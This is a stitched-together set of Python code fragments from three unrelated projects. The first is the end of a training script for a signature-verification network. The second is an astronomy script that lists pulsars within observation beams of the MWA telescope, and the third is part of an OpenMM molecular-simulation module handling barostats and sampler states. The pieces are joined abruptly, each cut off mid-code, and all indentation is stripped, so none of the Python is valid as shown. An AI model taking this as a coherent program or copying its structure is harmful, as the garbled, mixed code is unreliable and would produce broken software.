classification_layer.load_state_dict(classification_params)
if args.forg:
forg_layer.load_state_dict(forg_params)
val_acc, val_loss, val_forg_acc, val_forg_loss = test(val_loader, base_model, classification_layer,
device, args.forg, forg_layer)
if args.forg:
print('Val loss: {:.4f}, Val acc: {:.2f}%,'
' Val forg loss: {:.4f}, Val forg acc: {:.2f}%'.format(val_loss,
val_acc * 100,
val_forg_loss,
val_forg_acc * 100))
else:
print('Val loss: {:.4f}, Val acc: {:.2f}%'.format(val_loss, val_acc * 100))
else:
print('Training')
train(base_model, classification_layer, forg_layer, train_loader, val_loader,
device, logger, args, logdir)
def setup_data_loaders(data, batch_size, input_size):
label_encoder = LabelEncoder()
y = label_encoder.fit_transform(data[1])
data = TensorDataset(torch.from_numpy(data[0]), torch.from_numpy(y), torch.from_numpy(data[2]))
train_size = int(0.9 * len(data))
sizes = (train_size, len(data) - train_size)
train_set, test_set = random_split(data, sizes)
train_transforms = transforms.Compose([
transforms.ToPILImage(),
transforms.RandomCrop(input_size),
transforms.ToTensor(),
])
train_set = TransformDataset(train_set, train_transforms)
val_transforms = transforms.Compose([
transforms.ToPILImage(),
transforms.CenterCrop(input_size),
transforms.ToTensor(),
])
test_set = TransformDataset(test_set, val_transforms)
train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True)
val_loader = DataLoader(test_set, batch_size=batch_size)
return train_loader, val_loader
if __name__ == '__main__':
argparser = argparse.ArgumentParser('Train Signet/F')
argparser.add_argument('--dataset-path', help='Path containing a numpy file with images and labels')
argparser.add_argument('--input-size', help='Input size (cropped)', nargs=2, type=int, default=(150, 220))
argparser.add_argument('--users', nargs=2, type=int, default=(350, 881))
argparser.add_argument('--model', help='Model architecture', choices=models.available_models, required=True)
argparser.add_argument('--batch-size', help='Batch size', type=int, default=32)
argparser.add_argument('--lr', help='learning rate', default=0.001, type=float)
argparser.add_argument('--lr-decay', help='learning | |
<gh_stars>1-10
#! /usr/bin/env python3
"""
Author: <NAME>
Creation Date: /03/2016
Some of the original code was created by <NAME>
This code is used to list the sources within the beam of observation IDs or, using --obs_for_source, to list all the observations for each source. The sources can be input several ways: using a list of pulsar names (--pulsar), using a complete catalogue file of pulsars (--dl_PSRCAT) or RRATs (--RRAT and --dl_RRAT), using a compatible catalogue (--in_cat with the help of --names and --coordstype) or using an RA and DEC coordinate (--coords). The observation IDs can be input (--obsid) or gathered from a directory (--FITS_dir). The default is to search all observation IDs from http://mwa-metadata01.pawsey.org.au/metadata/ that have voltages and list every known pulsar from PSRCAT in each observation ID.
The two most common uses for this code are to search a single observation ID for pulsars like so:
> find_pulsar_in_obs.py -o 1099414416
which will output a text file called 1099414416_analytic_beam.txt
or to search all observation IDs for a single pulsar like so:
> find_pulsar_in_obs.py -p J0534+2200 --obs_for_source
which will output a text file called J0534+2200_analytic_beam.txt
"""
__author__ = '<NAME>'
__date__ = '2016-03-21'
import os
import sys
import argparse
import numpy as np
import csv
from vcstools.pointing_utils import sex2deg, format_ra_dec
import vcstools.sn_flux_utils as sfe
from vcstools.metadb_utils import get_obs_array_phase, singles_source_search,\
find_obsids_meta_pages, obs_max_min
from vcstools.catalogue_utils import grab_source_alog
from vcstools.beam_calc import find_sources_in_obs
import logging
logger = logging.getLogger(__name__)
class NoSourcesError(Exception):
"""Raise when no sources are found for any reason"""
pass
def yes_no(answer):
yes = set(['Y','yes','y', 'ye', ''])
no = set(['N','no','n'])
while True:
choice = input(answer).lower()
if choice in yes:
return True
elif choice in no:
return False
else:
logger.warning("Please respond with 'yes' or 'no'\n")
def cal_on_database_check(obsid):
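"""Check the MWA Pulsar Database for a calibration solution associated with obsid.
Returns 'A' if a calibration solution is available, 'U' if a calibrator was used,
and 'N' otherwise.
"""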
from mwa_pulsar_client import client
web_address = 'https://mwa-pawsey-volt01.pawsey.org.au'
auth = ('<PASSWORD>','<PASSWORD>=')
detection_list = client.detection_list(web_address, auth)
cal_used = False
cal_avail = False
for d in detection_list:
if int(d[u'observationid']) == int(obsid):
if d[u'calibrator'] is not None:
cal_used = True
#TODO add a check if there is a cal file option
#No cal
check_result = 'N'
if cal_avail:
#Cal available
check_result = 'A'
elif cal_used:
#Cal used
check_result = 'U'
return check_result
def write_output_source_files(output_data,
beam='analytic', min_power=0.3, cal_check=False,
SN_est=False, flux_est=False, plot_est=False,
min_time=0):
"""
Writes an output file using the output of find_sources_in_obs when obs_for_source is true.
"""
for source in output_data:
out_name = "{0}_{1}_beam.txt".format(source, beam)
with open(out_name,"w") as output_file:
output_file.write('#All of the observation IDs that the {0} beam model '
'calculated a power of {1} or greater for the source: '
'{2}\n'.format(beam, min_power, source))
output_file.write('#Column headers:\n')
output_file.write('#Obs ID: Observation ID\n')
output_file.write('#Dur: The duration of the observation in seconds\n')
output_file.write('#Enter: The fraction of the observation when '
'the source entered the beam\n')
output_file.write('#Exit: The fraction of the observation when '
'the source exits the beam\n')
output_file.write('#Power: The maximum zenith normalised power of the source.\n')
output_file.write("#OAP: The observation's array phase where P1 is the "
"phase 1 array, P2C is the phase compact array "
"and P2E is the phase 2 extended array.\n")
output_file.write("#Freq: The centre frequency of the observation in MHz\n")
output_file.write("#Band: Bandwidth of the observation in MHz. If it is greater "
"than 30.72 than it is a picket fence observation\n")
if SN_est:
output_file.write("#S/N Est: An estimate of the expected signal to noise using ANTF flux desnities\n")
output_file.write("#S/N Err: The uncertainty of S/N Est\n")
if flux_est:
output_file.write("#Flux Est: An estimate of the expected flux density (mJy) using ANTF flux desnities\n")
output_file.write("#Flux Err: The uncertainty of Flux Est (mJy)\n")
if cal_check:
output_file.write('#Cal ID: Observation ID of an available '+\
'calibration solution\n')
output_file.write('#Obs ID |Dur |Enter|Exit |Power| OAP | Freq | Band ')
if SN_est:
output_file.write("|S/N Est|S/N Err")
if flux_est:
output_file.write("|Flux Est|Flux Err")
if cal_check:
output_file.write("|Cal ID\n")
else:
output_file.write('\n')
for data in output_data[source]:
obsid, duration, enter, leave, max_power, freq, band = data
if duration > min_time:
if SN_est:
beg, end = obs_max_min(obsid)
oap = get_obs_array_phase(obsid)
output_file.write('{} {:4d} {:1.3f} {:1.3f} {:1.3f} {:.3} {:6.2f} {:6.2f}'.\
format(obsid, duration, enter, leave, max_power, oap, freq, band))
if SN_est:
pulsar_sn, pulsar_sn_err, _, _ = sfe.est_pulsar_sn(source, obsid, beg, end, plot_flux=plot_est)
if pulsar_sn is None:
output_file.write(' None None')
else:
output_file.write(' {:9.2f} {:9.2f}'.format(pulsar_sn, pulsar_sn_err))
if flux_est:
pulsar_flux, pulsar_flux_err = sfe.est_pulsar_flux(source, obsid, plot_flux=plot_est)
if pulsar_flux is None:
output_file.write(' None None')
else:
output_file.write(' {:8.2f} {:8.2f}'.format(pulsar_flux*1000, pulsar_flux_err*1000))
if cal_check:
#checks the MWA Pulsar Database to see if the obsid has been
#used or has been calibrated
logger.info("Checking the MWA Pulsar Databse for the obsid: {0}".format(obsid))
cal_check_result = cal_on_database_check(obsid)
output_file.write(" {0}\n".format(cal_check_result))
else:
output_file.write("\n")
return
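# Illustrative call (a sketch with made-up values). ``output_data`` maps each
# source name to a list of (obsid, duration, enter, exit, max_power, freq,
# band) tuples, matching the unpacking in the loop above:
#
#   >>> data = {'J0437-4715': [(1221832280, 4800, 0.0, 1.0, 0.87, 184.96, 30.72)]}
#   >>> write_output_source_files(data, beam='analytic', min_power=0.3)  # doctest: +SKIP
#
# This writes J0437-4715_analytic_beam.txt in the current directory.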
def write_output_obs_files(output_data, obsid_meta,
beam='analytic', min_power=0.3,
cal_check=False,
SN_est=False, flux_est=False, plot_est=False,
min_time=0):
"""
    Writes an output file per observation using the output of find_sources_in_obs when obs_for_source is False.
"""
for on, obsid in enumerate(output_data):
if SN_est or flux_est:
beg, end = obs_max_min(obsid)
psr_list = [el[0] for el in output_data[obsid]]
sn_dict = sfe.multi_psr_snfe(psr_list, obsid, beg, end,\
min_z_power=min_power, plot_flux=plot_est)
oap = get_obs_array_phase(obsid)
out_name = "{0}_{1}_beam.txt".format(obsid, beam)
with open(out_name,"w") as output_file:
            output_file.write('#All of the sources that the {0} beam model calculated a power '
'of {1} or greater for observation ID: {2}\n'.format(beam,
min_power, obsid))
            output_file.write('#Observation data: RA(deg): {0} DEC(deg): {1} Duration(s): '
                              '{2} Array Phase: {3}\n'.format(obsid_meta[on][1],
                              obsid_meta[on][2], obsid_meta[on][3], oap))
if cal_check:
#checks the MWA Pulsar Database to see if the obsid has been
#used or has been calibrated
logger.info("Checking the MWA Pulsar Databse for the obsid: {0}".format(obsid))
cal_check_result = cal_on_database_check(obsid)
output_file.write("#Calibrator Availability: {0}\n".format(cal_check_result))
output_file.write('#Column headers:\n')
output_file.write('#Source: Pulsar Jname\n')
            output_file.write('#Enter: The fraction of the observation when '+\
                              'the source enters the beam\n')
            output_file.write('#Exit: The fraction of the observation when '+\
                              'the source exits the beam\n')
output_file.write('#Power: The maximum zenith normalised power of the source.\n')
if SN_est:
output_file.write("#S/N Est: An estimate of the expected signal to noise using ANTF flux desnities\n")
output_file.write("#S/N Err: The uncertainty of S/N Est\n")
if flux_est:
output_file.write("#Flux Est: An estimate of the expected flux density (mJy) using ANTF flux desnities\n")
output_file.write("#Flux Err: The uncertainty of Flux Est (mJy)\n")
output_file.write('#Source |Enter|Exit |Power')
if SN_est:
output_file.write('| S/N Est | S/N Err')
if flux_est:
output_file.write("|Flux Est|Flux Err")
output_file.write('\n')
for data in output_data[obsid]:
pulsar, enter_beam, exit_beam, max_power = data
if (exit_beam - enter_beam) * obsid_meta[on][3] > min_time:
output_file.write('{:11} {:1.3f} {:1.3f} {:1.3f} '.format(pulsar,
enter_beam, exit_beam, max_power))
if SN_est:
pulsar_sn, pulsar_sn_err, _, _ = sn_dict[pulsar]
if pulsar_sn is None:
output_file.write(' None None')
else:
output_file.write('{:9.2f} {:9.2f}'.format(pulsar_sn, pulsar_sn_err))
if flux_est:
_, _, pulsar_flux, pulsar_flux_err = sn_dict[pulsar]
if pulsar_flux is None:
output_file.write(' None None')
else:
output_file.write('{:8.2f} {:8.2f}'.format(pulsar_flux*1000, pulsar_flux_err*1000))
output_file.write('\n')
return
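# Illustrative call (a sketch with made-up values). Here ``output_data`` maps
# each obsid to (pulsar, enter, exit, max_power) tuples and ``obsid_meta``
# carries RA, Dec and duration at indices 1-3, as read above:
#
#   >>> data = {1221832280: [('J0437-4715', 0.0, 1.0, 0.87)]}
#   >>> meta = [(1221832280, 69.3, -47.2, 4800)]
#   >>> write_output_obs_files(data, meta, beam='analytic')  # doctest: +SKIP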
if __name__ == "__main__":
# Dictionary for choosing log-levels
loglevels = dict(DEBUG=logging.DEBUG,
INFO=logging.INFO,
WARNING=logging.WARNING)
beam_models = ['analytic', 'advanced', 'full_EE']
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description="""
This code is used to list the sources within the beam of observation IDs or, using --obs_for_source, to list all the observations for each source. The sources can be input several ways: using a list of pulsar names (--pulsar), using a complete catalogue file of pulsars (--dl_PSRCAT) or RRATs (--RRAT and --dl_RRAT), using a compatible catalogue (--in_cat with the help of --names and --coordstype) or using an RA and DEC coordinate (--coords). The observation IDs can be input (--obsid) or gathered from a directory (--FITS_dir). The default is to search all observation IDs from http://mwa-metadata01.pawsey.org.au/metadata/ that have voltages and list every known pulsar from PSRCAT in each observation ID.
""")
parser.add_argument('--obs_for_source', action='store_true',
help='Instead of listing all the sources in each observation it will list all of the observations for each source. For increased efficiency it will only search OBSIDs within the primary beam.')
    parser.add_argument('-b', '--beam', type=str, default='analytic',
                        help='Decides the beam approximation that will be used. Options: "analytic" the analytic beam model (2012 model, fast and reasonably accurate), "advanced" the advanced beam model (2014 model, fast and slightly more accurate) or "full_EE" the full EE model (2016 model, slow but accurate). Default: "analytic"')
parser.add_argument('-m', '--min_power', type=float, default=0.3,
help='The minimum fraction of the zenith normalised power that a source needs to have to be recorded. Default 0.3')
parser.add_argument('--sn_est', action='store_true',
                        help='Make an expected signal to noise calculation using the flux densities from the ATNF pulsar catalogue and include them in the output file. Default: False.')
parser.add_argument('--flux_est', action='store_true',
                        help='Make an expected flux density calculation using the flux densities from the ATNF pulsar catalogue and include them in the output file. Default: False.')
        try:
            barostat_temperature = barostat.getDefaultTemperature()
        except AttributeError:  # versions of OpenMM prior to 7.1
            barostat_temperature = barostat.getTemperature()
barostat_pressure = self._get_barostat_pressure(barostat)
barostat_surface_tension = self._get_barostat_surface_tension(barostat)
is_consistent = self._is_barostat_type_consistent(barostat)
is_consistent = is_consistent and utils.is_quantity_close(barostat_temperature, self.temperature)
is_consistent = is_consistent and utils.is_quantity_close(barostat_pressure, self.pressure)
        if barostat_surface_tension is not None and self._surface_tension is not None:
            is_consistent = is_consistent and utils.is_quantity_close(barostat_surface_tension, self._surface_tension)
        else:
            is_consistent = is_consistent and (barostat_surface_tension == self._surface_tension)  # at least one is None
return is_consistent
def _set_system_pressure(self, system, pressure):
"""Add or configure the system barostat to the given pressure.
If a new barostat is added, its temperature is set to
self.temperature.
Parameters
----------
        system : simtk.openmm.System
            The system whose barostat will be added or configured.
        pressure : simtk.unit.Quantity or None
            The pressure, with units compatible with bars. If None, the
            barostat of the system is removed.
Raises
------
ThermodynamicsError
If pressure needs to be set for a non-periodic system.
"""
if pressure is None: # If new pressure is None, remove barostat.
self._pop_barostat(system)
return
if not system.usesPeriodicBoundaryConditions():
raise ThermodynamicsError(ThermodynamicsError.BAROSTATED_NONPERIODIC)
barostat = self._find_barostat(system)
if barostat is None: # Add barostat
barostat = openmm.MonteCarloBarostat(pressure, self.temperature)
system.addForce(barostat)
else: # Set existing barostat
self._set_barostat_pressure(barostat, pressure)
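    # In plain OpenMM terms, the "add" branch above amounts to the following
    # (an illustrative sketch assuming a periodic ``system``):
    #
    #   >>> barostat = openmm.MonteCarloBarostat(1.0*unit.atmosphere, 300.0*unit.kelvin)
    #   >>> force_index = system.addForce(barostat)  # doctest: +SKIP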
@staticmethod
def _set_barostat_pressure(barostat, pressure):
"""Set barostat pressure."""
if isinstance(pressure, unit.Quantity):
pressure = pressure.value_in_unit(unit.bar)
if isinstance(barostat, openmm.MonteCarloAnisotropicBarostat):
barostat.setDefaultPressure(openmm.Vec3(pressure, pressure, pressure)*unit.bar)
else:
barostat.setDefaultPressure(pressure*unit.bar)
@staticmethod
def _set_barostat_pressure_in_context(barostat, pressure, context):
"""Set barostat pressure."""
if isinstance(barostat, openmm.MonteCarloAnisotropicBarostat):
p = pressure.value_in_unit(unit.bar)
context.setParameter(barostat.Pressure(), openmm.Vec3(p, p, p)*unit.bar)
else:
context.setParameter(barostat.Pressure(), pressure)
@staticmethod
def _get_barostat_pressure(barostat):
"""Set barostat pressure."""
if isinstance(barostat, openmm.MonteCarloAnisotropicBarostat):
scaled = [barostat.getScaleX(), barostat.getScaleY(), barostat.getScaleZ()]
first_scaled_axis = scaled.index(True)
return barostat.getDefaultPressure()[first_scaled_axis]
else:
return barostat.getDefaultPressure()
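    # Example of the anisotropic branch above (a sketch with arbitrary values).
    # A MonteCarloAnisotropicBarostat stores a Vec3 of pressures plus per-axis
    # scaling flags, so the getter returns the pressure of the first scaled axis:
    #
    #   >>> p = openmm.Vec3(1.0, 1.0, 1.0)*unit.bar
    #   >>> barostat = openmm.MonteCarloAnisotropicBarostat(p, 300.0*unit.kelvin,
    #   ...                                                 False, False, True)
    #   >>> ThermodynamicState._get_barostat_pressure(barostat)  # doctest: +SKIP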
@staticmethod
def _set_barostat_temperature(barostat, temperature):
"""Set barostat temperature."""
barostat.setDefaultTemperature(temperature)
def _set_system_surface_tension(self, system, gamma):
"""Set system surface tension"""
if gamma is not None and not system.usesPeriodicBoundaryConditions():
raise ThermodynamicsError(ThermodynamicsError.BAROSTATED_NONPERIODIC)
barostat = self._find_barostat(system)
        # A surface tension must be given exactly when the barostat is a
        # MonteCarloMembraneBarostat; any other combination is inconsistent.
        if (gamma is None) == isinstance(barostat, openmm.MonteCarloMembraneBarostat):
            raise ThermodynamicsError(ThermodynamicsError.INCOMPATIBLE_ENSEMBLE)
self._set_barostat_surface_tension(barostat, gamma)
def _set_barostat_surface_tension(self, barostat, gamma):
# working around a bug in the unit conversion https://github.com/openmm/openmm/issues/2406
if isinstance(gamma, unit.Quantity):
gamma = gamma.value_in_unit(unit.bar * unit.nanometer)
if isinstance(barostat, openmm.MonteCarloMembraneBarostat):
barostat.setDefaultSurfaceTension(gamma)
elif gamma is not None:
raise ThermodynamicsError(ThermodynamicsError.SURFACE_TENSION_NOT_SUPPORTED)
def _get_barostat_surface_tension(self, barostat):
if isinstance(barostat, openmm.MonteCarloMembraneBarostat):
return barostat.getDefaultSurfaceTension()
else:
return None
@staticmethod
def _set_barostat_surface_tension_in_context(barostat, surface_tension, context):
"""Set barostat surface tension."""
# work around a unit conversion issue in openmm
if isinstance(surface_tension, unit.Quantity):
surface_tension = surface_tension.value_in_unit(unit.nanometer*unit.bar)
try:
context.getParameter(barostat.SurfaceTension())
except Exception:
raise ThermodynamicsError(ThermodynamicsError.INCOMPATIBLE_ENSEMBLE)
context.setParameter(barostat.SurfaceTension(), surface_tension)
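    # The only barostat carrying a surface tension is the membrane barostat.
    # An illustrative construction (a sketch; argument values are arbitrary,
    # and the surface tension is given in bar*nm because of the unit issue
    # noted above):
    #
    #   >>> barostat = openmm.MonteCarloMembraneBarostat(
    #   ...     1.0*unit.bar, 200.0*unit.bar*unit.nanometer, 300.0*unit.kelvin,
    #   ...     openmm.MonteCarloMembraneBarostat.XYIsotropic,
    #   ...     openmm.MonteCarloMembraneBarostat.ZFree, 25)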
# -------------------------------------------------------------------------
# Internal-usage: thermostat handling
# -------------------------------------------------------------------------
@classmethod
def _find_thermostat(cls, system, get_index=False):
"""Return the first thermostat in the system.
Returns
-------
        force_idx : int or None
            The force index of the thermostat. Only returned when get_index is True.
thermostat : OpenMM Force object or None
The thermostat in system, or None if no thermostat is found.
"""
try:
force_idx, thermostat = forces.find_forces(system, '.*Thermostat.*', only_one=True)
except forces.MultipleForcesError:
raise ThermodynamicsError(ThermodynamicsError.MULTIPLE_THERMOSTATS)
except forces.NoForceFoundError:
force_idx, thermostat = None, None
if get_index:
return force_idx, thermostat
return thermostat
@classmethod
def _remove_thermostat(cls, system):
"""Remove the system thermostat."""
thermostat_idx, thermostat = cls._find_thermostat(system, get_index=True)
if thermostat_idx is not None:
system.removeForce(thermostat_idx)
@classmethod
def _set_system_temperature(cls, system, temperature):
"""Configure thermostat and barostat to the given temperature.
The thermostat temperature is set, or a new AndersenThermostat
is added if it doesn't exist.
Parameters
----------
system : simtk.openmm.System
The system to modify.
temperature : simtk.unit.Quantity
The temperature for the thermostat.
"""
thermostat = cls._find_thermostat(system)
if thermostat is None:
thermostat = openmm.AndersenThermostat(temperature, 1.0/unit.picosecond)
system.addForce(thermostat)
else:
thermostat.setDefaultTemperature(temperature)
barostat = cls._find_barostat(system)
if barostat is not None:
cls._set_barostat_temperature(barostat, temperature)
# -------------------------------------------------------------------------
# Internal-usage: initialization
# -------------------------------------------------------------------------
@staticmethod
def _compute_reduced_potential(potential_energy, temperature, volume, pressure, area_xy=None, surface_tension=None):
"""Convert potential energy into reduced potential."""
beta = 1.0 / (unit.BOLTZMANN_CONSTANT_kB * temperature)
reduced_potential = potential_energy / unit.AVOGADRO_CONSTANT_NA
if pressure is not None:
reduced_potential += pressure * volume
if area_xy is not None and surface_tension is not None:
reduced_potential -= surface_tension * area_xy
return beta * reduced_potential
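    # A worked example of the reduction above (a sketch with arbitrary values):
    # u = beta * (U/N_A + p*V), which comes out dimensionless.
    #
    #   >>> U = -500.0*unit.kilojoules_per_mole
    #   >>> T, V, p = 300.0*unit.kelvin, 27.0*unit.nanometers**3, 1.0*unit.atmosphere
    #   >>> beta = 1.0 / (unit.BOLTZMANN_CONSTANT_kB * T)
    #   >>> beta * (U/unit.AVOGADRO_CONSTANT_NA + p*V)  # doctest: +SKIP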
def _find_force_groups_to_update(self, context, thermodynamic_state, memo):
"""Find the force groups to be recomputed when moving to the given state.
With the current implementation of ThermodynamicState, no force group has
to be recomputed as only temperature and pressure change between compatible
states, but this method becomes essential in CompoundThermodynamicState.
"""
return set()
# =============================================================================
# SAMPLER STATE
# =============================================================================
class SamplerState(object):
"""State carrying the configurational properties of a system.
Represent the portion of the state of a Context that changes with
integration. When initialized through the normal constructor, the
object is only partially defined as the energy attributes are None
until the SamplerState is updated with update_from_context. The
state can still be applied to a newly created context to set its
positions, velocities and box vectors. To initialize all attributes,
use the alternative constructor from_context.
Parameters
----------
positions : Nx3 simtk.unit.Quantity
Position vectors for N particles (length units).
velocities : Nx3 simtk.unit.Quantity, optional
Velocity vectors for N particles (velocity units).
box_vectors : 3x3 simtk.unit.Quantity
Current box vectors (length units).
Attributes
----------
positions
velocities
box_vectors : 3x3 simtk.unit.Quantity.
Current box vectors (length units).
potential_energy
kinetic_energy
total_energy
volume
n_particles
collective_variables
Examples
--------
>>> from openmmtools import testsystems
>>> toluene_test = testsystems.TolueneVacuum()
>>> sampler_state = SamplerState(toluene_test.positions)
At this point only the positions are defined
>>> sampler_state.velocities is None
True
>>> sampler_state.total_energy is None
True
but it can still be used to set up a context
>>> temperature = 300.0*unit.kelvin
>>> thermodynamic_state = ThermodynamicState(toluene_test.system, temperature)
>>> integrator = openmm.VerletIntegrator(1.0*unit.femtosecond)
>>> context = thermodynamic_state.create_context(integrator)
>>> sampler_state.apply_to_context(context) # Set initial positions.
    A SamplerState cannot be updated by an incompatible context,
    which here means a context with a different number of particles
>>> hostguest_test = testsystems.HostGuestVacuum()
>>> incompatible_state = ThermodynamicState(hostguest_test.system, temperature)
>>> integrator2 = openmm.VerletIntegrator(1.0*unit.femtosecond)
>>> incompatible_context = incompatible_state.create_context(integrator2)
>>> incompatible_context.setPositions(hostguest_test.positions)
>>> sampler_state.is_context_compatible(incompatible_context)
False
>>> sampler_state.update_from_context(incompatible_context)
Traceback (most recent call last):
...
openmmtools.states.SamplerStateError: Specified positions with inconsistent number of particles.
Create a new SamplerState instead
>>> sampler_state2 = SamplerState.from_context(context)
>>> sampler_state2.potential_energy is not None
True
It is possible to slice a sampler state to obtain positions and
particles of a subset of atoms
>>> sliced_sampler_state = sampler_state[:10]
>>> sliced_sampler_state.n_particles
10
"""
# -------------------------------------------------------------------------
# Public interface
# -------------------------------------------------------------------------
def __init__(self, positions, velocities=None, box_vectors=None):
# Allocate variables, they get set in _initialize
self._positions = None
self._velocities = None
self._box_vectors = None
self._collective_variables = None
self._kinetic_energy = None
self._potential_energy = None
        args = []
        # Normalize bare-sequence Quantities to numpy-backed Quantities;
        # also avoid shadowing the builtin input().
        for value in [positions, velocities, box_vectors]:
            if isinstance(value, unit.Quantity) and not isinstance(value._value, np.ndarray):
                args.append(np.array(value/value.unit)*value.unit)
            else:
                args.append(copy.deepcopy(value))
        self._initialize(*args)
@classmethod
def from_context(cls, context_state, ignore_collective_variables=False):
"""Alternative constructor.
Read all the configurational properties from a Context object or
an OpenMM State object. This guarantees that all attributes
(including energy attributes) are initialized.
Parameters
----------
context_state : simtk.openmm.Context or simtk.openmm.State
The object to read. If a State object, it must contain information
about positions, velocities and energy.
        ignore_collective_variables : bool, optional
            If True, collective variables are not read from the Context
            and are left invalidated. When a State object is passed in,
            this must be True or an error is raised, since a State alone
            cannot distinguish a System with collective variables from one without.
Returns
-------
sampler_state : SamplerState
A new SamplerState object.
"""
sampler_state = cls([])
sampler_state._read_context_state(context_state, check_consistency=False,
ignore_positions=False,
ignore_velocities=False,
ignore_collective_variables=ignore_collective_variables)
return sampler_state
@property
def positions(self):
"""Particle positions.
An Nx3 simtk.unit.Quantity object, where N is the number of
particles.
Raises
------
SamplerStateError
If set to an array with a number of particles different
than n_particles.
"""
return self._positions
@positions.setter
def positions(self, value):
self._set_positions(value, from_context=False, check_consistency=True)
@property
def velocities(self):
"""Particle velocities.
An Nx3 simtk.unit.Quantity object, where N is the number of
particles.
Raises
------
SamplerStateError
If set to an array with a number of particles different
than n_particles.
"""
return self._velocities
@velocities.setter
def velocities(self, value):
self._set_velocities(value, from_context=False)
@property
def box_vectors(self):
"""Box vectors.
        A 3x3 simtk.unit.Quantity object.
"""
return self._box_vectors
@box_vectors.setter
def box_vectors(self, value):
# Make sure this is a Quantity. System.getDefaultPeriodicBoxVectors
# returns a list of Quantity objects instead for example.
if value is not None and not isinstance(value, unit.Quantity):
value = unit.Quantity(value)
self._box_vectors = value
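    # Example of the normalization above (a sketch): OpenMM returns the default
    # box as a sequence of Vec3 Quantities, which the setter wraps in a single
    # unit.Quantity:
    #
    #   >>> sampler_state.box_vectors = system.getDefaultPeriodicBoxVectors()  # doctest: +SKIP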
# Derived properties
@property
def potential_energy(self):
"""simtk.unit.Quantity or None: Potential energy of this configuration."""
        if not self._are_positions_valid:
            return None
return self._potential_energy
@potential_energy.setter
def potential_energy(self, new_value):
if new_value is not None:
raise AttributeError("Cannot set potential energy as it is a function of Context")
|